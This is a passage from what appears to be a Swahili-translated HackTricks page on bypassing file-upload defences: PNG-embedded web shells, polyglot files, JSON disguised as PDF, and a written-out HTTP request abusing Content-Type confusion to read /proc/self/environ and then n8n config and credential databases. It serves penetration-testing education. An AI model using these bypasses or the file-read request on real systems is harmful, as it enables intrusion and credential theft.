Uchambuzi wa kina wa mbinu hii, pamoja na metodolojia yake na matumizi yanayowezekana, umetolewa katika makala ifuatayo: “Encoding Web Shells in PNG IDAT chunks”. Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake.

More information in: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Faili za Polyglot

Faili za polyglot hutoa chombo maalum katika usalama wa mtandao, zikifanya kazi kama chameleons ambazo zinaweza kuwepo kwa njia halali katika muundo mbalimbali wa faili kwa wakati mmoja. Mfano wa kuvutia ni GIFAR, mchanganyiko unaofanya kazi kama GIF na kama archive ya RAR. Faili kama hizi hazina kikomo kwa jozi hii tu; mchanganyiko kama GIF na JS au PPT na JS pia ni uwezekano.

Manufaa makuu ya faili za polyglot yako katika uwezo wake wa kupitisha hatua za usalama zinazochunguza faili kwa msingi wa aina. Mazoea ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na formats hatarishi (mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi, inaweza kupita kwa utaratibu huu kwa utulivu.

Licha ya uwezo wake wa kubadilika, polyglots hukutana na vizingiti. Kwa mfano, wakati polyglot inaweza kwa wakati mmoja kuwa PHAR file (PHp ARchive) na JPEG, mafanikio ya upload yayo yanaweza kutegemea sera za platform kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazokubaliwa, dhana tu ya duality ya muundo ya polyglot inaweza isitoshe kuhakikisha upload yake.

More information in: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Upload valid JSONs like if it was PDF

Jinsi ya kuepuka file type detections kwa kupakia faili halali ya JSON hata ikiwa hairuhusiwi kwa kuiga faili ya PDF (mbinu kutoka kwa this blog post):

• mmmagic library: Mradi tu %PDF magic bytes ziko katika byte 1024 za kwanza ni halali (angalia mfano kwenye post)
• pdflib library: Ongeza fake PDF format ndani ya sehemu ya JSON ili library ifikirie ni PDF (angalia mfano kwenye post)
• file binary: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa zaidi ya hivyo ili isiweze kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF

Content-Type confusion to arbitrary file read

Baadhi ya upload handlers trust the parsed request body (mfano, context.getBodyData().files) na baadaye copy the file from file.filepath bila kwanza kulazimisha Content-Type: multipart/form-data. Ikiwa server inakubali application/json, unaweza kutoa fake files object ikielekeza filepath kwa any local path, ukigeuza mtiririko wa upload kuwa primitive ya kusoma faili yoyote.

Example POST against a form workflow returning the uploaded binary in the HTTP response:

POST /form/vulnerable-form HTTP/1.1
Host: target
Content-Type: application/json

{
"files": {
"document": {
"filepath": "/proc/self/environ",
"mimetype": "image/png",
"originalFilename": "x.png"
}
}
}

Backend inakopia file.filepath, hivyo jibu linarudisha yaliyomo ya njia hiyo. Mfuatano wa kawaida: soma /proc/self/environ ili kujua $HOME, kisha $HOME/.n8n/config kwa ajili ya vifunguo na $HOME/.n8n/database.sqlite kwa vitambulisho vya watumiaji.

Marejeo

• n8n form upload Content-Type confusion → arbitrary file read PoC
• When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
• https://github.com/modzero/mod0BurpUploadScanner
• https://github.com/almandin/fuxploider
• https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
• https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
• https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
• https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
• usd HeroLab – Gibbon LMS arbitrary file write (CVE-2023-45878)
• NVD – CVE-2023-45878
• 0xdf – HTB: TheFrizz
• The Art of PHP: CTF‑born exploits and techniques
• CVE-2024-21546 – NVD entry
• PoC gist for LFM .php. bypass
• 0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)
• HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
• Microsoft – mklink (command reference)
• 0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.